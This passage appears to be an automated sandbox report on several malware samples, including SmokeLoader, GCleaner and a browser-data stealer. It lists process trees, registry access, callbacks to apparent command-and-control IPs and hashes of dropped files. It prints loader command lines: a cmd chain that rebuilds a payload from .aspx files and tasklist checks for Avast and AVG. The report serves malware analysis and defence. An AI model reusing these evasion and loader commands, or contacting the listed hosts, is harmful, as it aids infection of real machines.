FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 157.240.214.35:443 www.facebook.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 35.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 aaa.apiaaaeg.com udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 aaa.apiaaaeg.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/5104-0-0x0000000140000000-0x000000014060D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1728 -ip 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 460

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/1728-3-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1728-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1728-1-0x0000000000560000-0x0000000000660000-memory.dmp

memory/1728-4-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1728-5-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20241010-en

Max time kernel

32s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2580 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2580 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2580 -s 1084

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
US 8.8.8.8:53 aaa.apiaaaeg.com udp

Files

memory/2580-1-0x0000000140000000-0x000000014060D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab7FCC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar800E.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 920

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 940

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1144

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 1188

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 916 -ip 916

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 916 -s 884

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 171.117.168.52.in-addr.arpa udp
US 208.67.104.97:80 tcp

Files

memory/916-1-0x0000000000790000-0x0000000000890000-memory.dmp

memory/916-2-0x0000000000530000-0x000000000056F000-memory.dmp

memory/916-3-0x0000000000400000-0x0000000000443000-memory.dmp

memory/916-4-0x0000000000790000-0x0000000000890000-memory.dmp

memory/916-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/916-6-0x0000000000530000-0x000000000056F000-memory.dmp

memory/916-7-0x0000000000400000-0x0000000000443000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 444 set thread context of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\tasklist.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\at.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\find.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2720 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 2720 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 2720 wrote to memory of 4012 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\at.exe
PID 2720 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 2720 wrote to memory of 3416 N/A C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3416 wrote to memory of 1060 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1060 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 2156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 2288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 1992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\tasklist.exe
PID 1060 wrote to memory of 4992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 4992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 4992 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1060 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1060 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1060 wrote to memory of 3900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 1060 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1060 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1060 wrote to memory of 444 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 1060 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1060 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1060 wrote to memory of 1172 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3416 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3416 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 3416 wrote to memory of 3124 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif
PID 444 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Une1.exe"

C:\Windows\SysWOW64\at.exe

at 3874982763784yhwgdfg78234789s42809374918uf

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Film.aspx & ping -n 5 localhost

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AvastUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avastui.exe"

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq AVGUI.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "avgui.exe"

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^otPcqYaF$" Deliver.aspx

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Tanks.exe.pif A

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 bDIATguLPNddTCYKKaxjQJVwvtXO.bDIATguLPNddTCYKKaxjQJVwvtXO udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
NL 109.206.241.33:80 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp
NL 109.206.241.33:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Film.aspx

MD5 8eb593f08a4cca9959a469af6528ac0d
SHA1 8f4ae3c90b6d653eb75224683358f12dfc442dca
SHA256 7903967eca6727d611e46d666d2871d4438e9bc65ea185e01787c8a8a3e5ce70
SHA512 631403ca6e37a317158ba583e5b0f05e83157abc4cb4865f8d0d8f6e11ef39ab150fe948961aebcaff5c01ace0345ca6dc3882306ab0ce84eec6c1dfdf822ca9

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Deliver.aspx

MD5 701381da8e4a87f18a22b98eee09a22b
SHA1 f5ff5c1714155b853a8335b1d359a010c012c596
SHA256 8b21bc4f93cc9a8438ec08d1385f2d7dead6291a741fdfe7b6960c9f9917f6b3
SHA512 55ef35ce31c1fac2ff91efb3b4a5f646f3cfc7a0c4592f9da3e444a6472203608e224cf55dfa5c79025247c41aa8cbad759ef65dee9f95fe5c244dee239dc141

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Accurate.aspx

MD5 ffc713ff8173dac3c96bc583eb916705
SHA1 3c1b3e1eb258e304722ecc876820a470d491467d
SHA256 8d9c5d3eb7d4bfeb8ab1c5f4dde38dea52624ed80b188648fbab2ada88505ae4
SHA512 8af86a88e0bb60941ec5a55678c97f9a25518f2e140fc2e792115cb653b5f5a745630d970492565944116f3c5e5dc053c22b60ad8287ce5b921e47371125bc8f

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tanks.exe.pif

MD5 6987e4cd3f256462f422326a7ef115b9
SHA1 71672a495b4603ecfec40a65254cb3ba8766bbe0
SHA256 3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0
SHA512 4b1d7f7ffee39a2d65504767beeddd4c3374807a93889b14e7e73db11e478492dec349aedca03ce828f21a66bb666a68d3735443f4249556e10825a4cd7dfeb4

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\xEvsgieS.dll

MD5 4f3387277ccbd6d1f21ac5c07fe4ca68
SHA1 e16506f662dc92023bf82def1d621497c8ab5890
SHA256 767a3fc4a7a6818cdc3f0b99aaa95db694f6bcde719d2057a88b3d4df3d74fac
SHA512 9da199ac69e3c0d4e0c6307e0ab8178f12cc25cb2f14c3511f6b64e6e60a925c860f3263cb38353a97b55a71ef4d27f8cb7fa3cfc08e7c1a349fd8d209dfa219

memory/444-31-0x0000000000A20000-0x0000000000B0B000-memory.dmp

memory/5032-32-0x0000000000A20000-0x0000000000B0B000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:04

Platform

win7-20240903-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2088 -s 168

Network

N/A

Files

memory/2088-1-0x00000000005D0000-0x00000000006D0000-memory.dmp

memory/2088-2-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2088-3-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2088-5-0x0000000000220000-0x0000000000229000-memory.dmp

memory/2088-4-0x0000000000400000-0x0000000000448000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20241010-en

Max time kernel

142s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PL\setup.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Network

Country Destination Domain Proto
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp

Files

memory/576-1-0x00000000005B0000-0x00000000006B0000-memory.dmp

memory/576-3-0x0000000000400000-0x000000000045E000-memory.dmp

memory/576-2-0x0000000000400000-0x0000000000443000-memory.dmp

memory/576-4-0x00000000005B0000-0x00000000006B0000-memory.dmp

memory/576-5-0x0000000000400000-0x0000000000443000-memory.dmp

memory/576-6-0x0000000000400000-0x000000000045E000-memory.dmp